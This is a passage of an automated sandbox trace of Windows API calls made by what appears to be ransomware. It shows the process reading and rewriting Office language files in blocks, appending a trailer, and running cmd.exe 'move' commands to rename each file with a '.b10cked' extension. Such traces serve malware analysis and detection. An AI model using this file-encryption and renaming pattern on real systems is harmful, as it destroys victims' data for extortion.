lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xf5b60 [0160.948] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.948] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.949] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0160.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0160.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WWINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0160.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x115b60 [0160.953] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0160.953] CloseHandle (hObject=0x114) returned 1 [0160.963] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll", lpszShortPath=0x1273a8c, 
cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX") returned 0x3c [0160.964] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0160.965] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x978, dwThreadId=0x208)) returned 1 [0160.967] CloseHandle (hObject=0x1b4) returned 1 [0160.967] CloseHandle (hObject=0x114) returned 1 [0160.967] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0160.967] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0160.967] CompareStringW (Locale=0x400, dwCmpFlags=0x0, 
lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0160.967] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.967] ReleaseMutex (hMutex=0xf8) returned 1 [0160.967] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.967] ReleaseMutex (hMutex=0xf8) returned 1 [0160.967] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.967] ReleaseMutex (hMutex=0xf8) returned 1 [0160.967] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.967] ReleaseMutex (hMutex=0xf8) returned 1 [0160.967] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.969] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21775830395) returned 1 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x25360 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.971] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.971] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.971] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25360 [0160.971] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.971] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x24e78 [0160.971] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x25360 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x25360 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0160.973] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.973] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x39af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x39af, lpOverlapped=0x0) returned 1 [0160.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0160.974] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.974] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x39af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x39af, lpOverlapped=0x0) returned 1 [0160.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=-76207, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x129b1 [0160.974] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.975] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x39af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x39af, lpOverlapped=0x0) returned 1 [0160.976] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=-76207, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x129b1 [0160.976] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.976] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x39af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x39af, lpOverlapped=0x0) returned 1 [0160.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0160.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLINTL32.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0160.980] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x25360 [0160.980] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0160.980] CloseHandle (hObject=0x114) returned 1 [0160.981] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX") returned 0x3c [0160.982] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0160.982] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x90c, dwThreadId=0xd68)) returned 1 [0161.541] CloseHandle (hObject=0x1b4) returned 1 [0161.541] CloseHandle (hObject=0x114) returned 1 [0161.541] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0161.541] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0161.541] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 
2 [0161.541] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0161.541] ReleaseMutex (hMutex=0xf8) returned 1 [0161.541] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0161.541] ReleaseMutex (hMutex=0xf8) returned 1 [0161.541] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0161.542] ReleaseMutex (hMutex=0xf8) returned 1 [0161.542] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0161.542] ReleaseMutex (hMutex=0xf8) returned 1 [0161.542] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.545] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21833402702) returned 1 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.546] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 